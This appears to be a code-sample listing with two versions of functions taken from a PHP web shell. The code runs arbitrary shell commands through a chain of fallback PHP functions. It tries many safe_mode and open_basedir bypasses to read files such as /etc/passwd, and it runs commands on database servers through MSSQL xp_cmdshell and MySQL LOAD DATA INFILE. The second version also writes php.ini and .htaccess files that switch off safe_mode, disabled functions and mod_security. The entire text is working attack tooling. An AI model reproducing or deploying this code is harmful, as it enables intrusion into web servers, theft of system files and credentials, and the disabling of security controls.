Пример #1
0
function Exe($command)
{
    $exec = $output = '';
    $dep[] = array('pipe', 'r');
    $dep[] = array('pipe', 'w');
    if (function_exists('passthru')) {
        ob_start();
        @passthru($command);
        $exec = ob_get_contents();
        ob_clean();
        ob_end_clean();
    } elseif (function_exists('system')) {
        $tmp = ob_get_contents();
        ob_clean();
        @system($command);
        $output = ob_get_contents();
        ob_clean();
        $exec = $tmp;
    } elseif (function_exists('exec')) {
        @exec($command, $output);
        $output = join("\n", $output);
        $exec = $output;
    } elseif (function_exists('shell_exec')) {
        $exec = @shell_exec($command);
    } elseif (function_exists('popen')) {
        $output = @popen($command, 'r');
        while (!feof($output)) {
            $exec = fgets($output);
        }
        pclose($output);
    } elseif (function_exists('proc_open')) {
        $res = @proc_open($command, $dep, $pipes);
        while (!feof($pipes[1])) {
            $line = fgets($pipes[1]);
            $output .= $line;
        }
        $exec = $output;
        proc_close($res);
    } elseif (function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        $exec = winshelL($command);
    } elseif (function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        $exec = srvshelL($command);
    } elseif (extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        $exec = ffishelL($command);
    } elseif (extension_loaded('perl')) {
        $exec = perlshelL($command);
    }
    return $exec;
}
function safemodE()
{
    global $windows, $t, $hcwd, $et;
    $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
    $pr = "\r\n</font><font color=green>Method ";
    $po = ")</font><font color=blue>\r\n";
    $i = 1;
    if (!empty($_REQUEST['read'])) {
        echo "<pre>{$pr}{$i}:(ini_restore{$po}";
        ini_restore('safe_mode');
        ini_restore('open_basedir');
        readfile($file);
        $i++;
        echo "{$pr}{$i}:(include{$po}";
        include $file;
        $i++;
        echo "{$pr}{$i}:(copy{$po}";
        $tmp = tempnam('', 'cx');
        copy('compress.zlib://' . $file, $tmp);
        $fh = fopen($tmp, 'r');
        $data = fread($fh, filesize($tmp));
        fclose($fh);
        echo $data;
        $i++;
        if (function_exists('mb_send_mail')) {
            echo "{$pr}{$i}:(mb_send_mail{$po}";
            if (file_exists('/tmp/mb_send_mail')) {
                unlink('/tmp/mb_send_mail');
            }
            mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
            readfile('/tmp/mb_send_mail');
            $i++;
        }
        if (function_exists('curl_init')) {
            echo "{$pr}{$i}:(curl_init [A]{$po}";
            $fh = curl_init('file://' . $file . '');
            $tmp = curl_exec($fh);
            echo $tmp;
            $i++;
            echo "{$pr}{$i}:(curl_init [B]{$po}";
            $i++;
            if (strstr($file, DIRECTORY_SEPARATOR)) {
                $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
            } else {
                $ch = curl_init('file://' . $file . "" . __FILE__);
            }
            var_dump(curl_exec($ch));
        }
        if (is_writable('.')) {
            echo "{$pr}{$i}:(php.ini{$po}";
            file_put_contents('php.ini', 'safe_mode = Off');
            readfile($file);
            unlink('php.ini');
            $i++;
        }
        if (is_object($ws = new COM('WScript.Shell'))) {
            echo "{$pr}{$i}:(COM{$po}";
            echo $exec = comshelL("type \"{$file}\"", $ws);
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("type \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("type \"{$file}\"");
            $i++;
        }
        if (function_exists('imap_open')) {
            echo "{$pr}{$i}:(imap [A]{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $list = imap_list($str, $file, '*');
            for ($i = 0; $i < count($list); $i++) {
                echo $list[$i] . "\n";
            }
            imap_close($str);
            $i++;
            echo "{$pr}{$i}:(imap [B]{$po}";
            $str = imap_open($file, '', '');
            $tmp = imap_body($str, 1);
            echo $tmp;
            imap_close($str);
            $i++;
        }
        if ($file == '/etc/passwd') {
            echo "{$pr}{$i}:(posix{$po}";
            for ($uid = 0; $uid < 99999; $uid++) {
                $h = posix_getpwuid($uid);
                if (!empty($h)) {
                    foreach ($h as $v) {
                        echo "{$v}:";
                    }
                }
                echo "\r\n";
            }
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['show'])) {
        echo "<pre>{$pr}{$i}:(glob{$po}";
        $con = glob("{$file}*");
        foreach ($con as $v) {
            echo "{$v}\n";
        }
        $i++;
        if (function_exists('imap_open')) {
            echo "{$pr}{$i}:(imap{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $s = explode("|", $file);
            if (count($s) > 1) {
                $list = imap_list($str, trim($s[0]), trim($s[1]));
            } else {
                $list = imap_list($str, trim($str[0]), '*');
            }
            for ($i = 0; $i < count($list); $i++) {
                echo "{$list[$i]}\r\n";
            }
            imap_close($str);
            $i++;
        }
        if (is_object($ws = new COM('WScript.Shell'))) {
            echo "{$pr}{$i}:(COM{$po}";
            $exec = comshelL("dir \"{$file}\"", $ws);
            $exec = str_replace("\t", '', $exec);
            echo $exec;
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("dir \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("dir \"{$file}\"");
            $i++;
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['sql'])) {
        $ta = uniqid('N');
        $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
        $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
        mysql_select_db($_REQUEST['db'], $l);
        echo '<pre><font color=blue>';
        foreach ($s as $v) {
            $q = mysql_query($v, $l);
            while ($d = mysql_fetch_row($q)) {
                echo htmlspecialchars($d[0]);
            }
        }
        echo '</pre></font>';
    } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
        $res = '';
        $tb = uniqid('NJ');
        $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
        mssql_select_db($_REQUEST['dB'], $db);
        mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
        mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
        $re = mssql_query("select * from {$tb}", $db);
        while ($row = mssql_fetch_row($re)) {
            $res .= $row[0] . "\r\n";
        }
        mssql_query("drop table {$tb}", $db);
        mssql_close($db);
        echo "<center><textarea rows='18' cols='64'>{$res}</textarea></center><br>";
    }
    $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
    $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'cbfteam';
    $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
    $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
    echo "<center>{$t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>{$hcwd}<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>{$et}<br>{$t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='{$u}'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='{$p}'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='{$d}'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>{$hcwd}<input class=buttons type=submit name=sql value='Read'></form>{$et}<br>{$t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
    if (!empty($_REQUEST['serveR'])) {
        echo htmlspecialchars($_REQUEST['serveR']);
    } else {
        echo 'localhost';
    }
    echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
    if (!empty($_REQUEST['useR'])) {
        echo htmlspecialchars($_REQUEST['useR']);
    } else {
        echo 'sa';
    }
    echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";
    if (!empty($_REQUEST['pasS'])) {
        echo htmlspecialchars($_REQUEST['pasS']);
    }
    echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";
    if (!empty($_REQUEST['coM'])) {
        echo htmlspecialchars($_REQUEST['coM']);
    } else {
        echo 'dir c:';
    }
    echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";
    if (isset($_REQUEST['dB'])) {
        echo htmlspecialchars($_REQUEST['dB']);
    } else {
        echo 'master';
    }
    echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{$hcwd}<input class=buttons type=submit value='Execute'></form>{$et}</center>";
}
Пример #3
0
function safemodE()
{
    global $windows, $hcwd;
    $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
    $pr = "\r\n</font><font color=green>Method ";
    $po = ")</font><font color=#FA0>\r\n";
    $i = 1;
    if (!empty($_REQUEST['read'])) {
        echo "<pre>{$pr}{$i}:(ini_restore{$po}";
        ini_restore('safe_mode');
        ini_restore('open_basedir');
        readfile($file);
        $i++;
        if (checkfunctioN("ioncube_read_file")) {
            echo "{$pr}{$i}:(ionCube{$po}";
            echo ioncube_read_file($file);
            $i++;
        }
        if (checkfunctioN('symlink')) {
            echo "{$pr}{$i}:(symlink{$po}";
            $lnk = whereistmP() . DIRECTORY_SEPARATOR . uniqid('lnk_');
            @symlink($file, $lnk);
            @readfile($lnk);
            @unlink($lnk);
            $i++;
        }
        echo "{$pr}{$i}:(include{$po}";
        include $file;
        $i++;
        echo "{$pr}{$i}:(copy{$po}";
        $tmp = tempnam('', 'cx');
        copy('compress.zlib://' . $file, $tmp);
        $fh = fopen($tmp, 'r');
        $data = fread($fh, filesize($tmp));
        fclose($fh);
        echo $data;
        $i++;
        if (checkfunctioN('mb_send_mail')) {
            echo "{$pr}{$i}:(mb_send_mail{$po}";
            if (file_exists('/tmp/mb_send_mail')) {
                unlink('/tmp/mb_send_mail');
            }
            mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
            readfile('/tmp/mb_send_mail');
            $i++;
        }
        if (checkfunctioN('curl_init')) {
            echo "{$pr}{$i}:(curl_init [A]{$po}";
            $fh = curl_init('file://' . $file . '');
            $tmp = curl_exec($fh);
            echo $tmp;
            $i++;
            echo "{$pr}{$i}:(curl_init [B]{$po}";
            $i++;
            if (strstr($file, DIRECTORY_SEPARATOR)) {
                $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
            } else {
                $ch = curl_init('file://' . $file . "" . __FILE__);
            }
            var_dump(curl_exec($ch));
        }
        if ($windows) {
            echo "{$pr}{$i}:(shell{$po}";
            echo shelL("type \"{$file}\"");
            $i++;
        } else {
            echo "{$pr}{$i}:(shell{$po}";
            echo shelL("cat {$file}");
            $i++;
        }
        if (checkfunctioN('imap_open')) {
            echo "{$pr}{$i}:(imap [A]{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $list = imap_list($str, $file, '*');
            for ($i = 0; $i < count($list); $i++) {
                echo $list[$i] . "\n";
            }
            imap_close($str);
            $i++;
            echo "{$pr}{$i}:(imap [B]{$po}";
            $str = imap_open($file, '', '');
            $tmp = imap_body($str, 1);
            echo $tmp;
            imap_close($str);
            $i++;
        }
        if ($file == '/etc/passwd') {
            echo "{$pr}{$i}:(posix{$po}";
            for ($uid = 0; $uid < 99999; $uid++) {
                $h = posix_getpwuid($uid);
                if (!empty($h)) {
                    foreach ($h as $k => $v) {
                        echo "{$v}";
                        if ($k != 'shell') {
                            echo ":";
                        }
                    }
                    echo "\r\n";
                }
            }
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['show'])) {
        echo "<pre>{$pr}{$i}:(glob{$po}";
        $con = glob("{$file}*");
        foreach ($con as $v) {
            echo "{$v}\n";
        }
        $i++;
        if (checkfunctioN('imap_open')) {
            echo "{$pr}{$i}:(imap{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $s = explode("|", $file);
            if (count($s) > 1) {
                $list = imap_list($str, trim($s[0]), trim($s[1]));
            } else {
                $list = imap_list($str, trim($str[0]), '*');
            }
            for ($i = 0; $i < count($list); $i++) {
                echo "{$list[$i]}\r\n";
            }
            imap_close($str);
            $i++;
        }
        if (class_exists('COM')) {
            echo "{$pr}{$i}:(COM{$po}";
            $ws = new COM('WScript.Shell');
            $exec = comshelL("dir \"{$file}\"", $ws);
            $exec = str_replace("\t", '', $exec);
            echo $exec;
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("dir \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("dir \"{$file}\"");
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['create'])) {
        $i = 1;
        $dir = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        if (is_writable($dir)) {
            echo "<pre>{$pr}{$i}:(php.ini{$po}";
            file_put_contents($dir . 'php.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
            echo "\nphp.ini created!\n";
            $i++;
            echo "{$pr}{$i}:(ini.ini{$po}";
            file_put_contents($dir . 'ini.ini', "safe_mode = Off\r\ndisable_functions = NONE\r\nsafe_mode_gid = Off\r\nopen_basedir = Off");
            echo "\nini.ini created!\n";
            $i++;
            echo "{$pr}{$i}:(.htaccess{$po}";
            file_put_contents($dir . '.htaccess', "<IfModule mod_security.c>\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\nSecFilterCheckCookieFormat Off\r\nSecFilterNormalizeCookies Off\r\nSecFilterCheckURLEncoding Off\r\nSecFilterCheckUnicodeEncoding Off\r\n</IfModule>");
            echo "\n.htaccess created!\n";
            echo "\nCheck if safe-mode is off.\n</pre></font>";
        } else {
            echo "Local directory is not writable!";
        }
    } elseif (!empty($_REQUEST['sql'])) {
        $ta = uniqid('N');
        $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
        $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
        mysql_select_db($_REQUEST['db'], $l);
        echo '<pre><font color=#FA0>';
        foreach ($s as $v) {
            $q = mysql_query($v, $l);
            while ($d = mysql_fetch_row($q)) {
                echo htmlspecialchars($d[0]);
            }
        }
        echo '</pre></font>';
    } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
        $res = '';
        $tb = uniqid('NJ');
        $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
        mssql_select_db($_REQUEST['dB'], $db);
        mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
        mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
        $re = mssql_query("select * from {$tb}", $db);
        while ($row = mssql_fetch_row($re)) {
            $res .= $row[0] . "\r\n";
        }
        mssql_query("drop table {$tb}", $db);
        mssql_close($db);
        echo "<div align=center><textarea rows='18' cols='64'>{$res}</textarea></div><br>";
    }
    $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
    $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'root';
    $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
    $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
    echo '
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Disable safe-mode & mod_sec</label>
</div><div class="fieldwrapper">
<label class="styled">Create config files:</label>
<div class="thefield">
php.ini<br />
ini.ini<br />
.htaccess<br />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="create" value="Create" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use PHP Bugs</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div>' . $hcwd . '<div class="buttonsdiv">
<input type="submit" name="read" value="Read File" style="margin-left: 150px;" />
</div>
<div class="buttonsdiv">
<input type="submit" name="show" value="List directory" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client1" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">Use MySQL</label>
</div><div class="fieldwrapper">
<label class="styled">File:</label>
<div class="thefield">
<input type="text" name="file" value="' . $f . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="user" value="' . $u . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pass" value="' . $p . '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="db" value="' . $d . '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" name="sql" value="Read" style="margin-left: 150px;" />
</div>
</form>
<br />
<form name="client2" method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">MSSQL Exec</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="serveR" value="';
    if (!empty($_REQUEST['serveR'])) {
        echo htmlspecialchars($_REQUEST['serveR']);
    } else {
        echo 'localhost';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="';
    if (!empty($_REQUEST['useR'])) {
        echo htmlspecialchars($_REQUEST['useR']);
    } else {
        echo 'sa';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="';
    if (!empty($_REQUEST['pasS'])) {
        echo htmlspecialchars($_REQUEST['pasS']);
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Command:</label>
<div class="thefield">
<input type="text" name="coM" value="';
    if (!empty($_REQUEST['coM'])) {
        echo htmlspecialchars($_REQUEST['coM']);
    } else {
        echo 'dir c:';
    }
    echo '" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Database:</label>
<div class="thefield">
<input type="text" name="dB" value="';
    if (!empty($_REQUEST['dB'])) {
        echo htmlspecialchars($_REQUEST['dB']);
    } else {
        echo 'master';
    }
    echo '" size="30" />
</div>
</div>' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Execute" style="margin-left: 150px;" />
</div>
</form>
';
}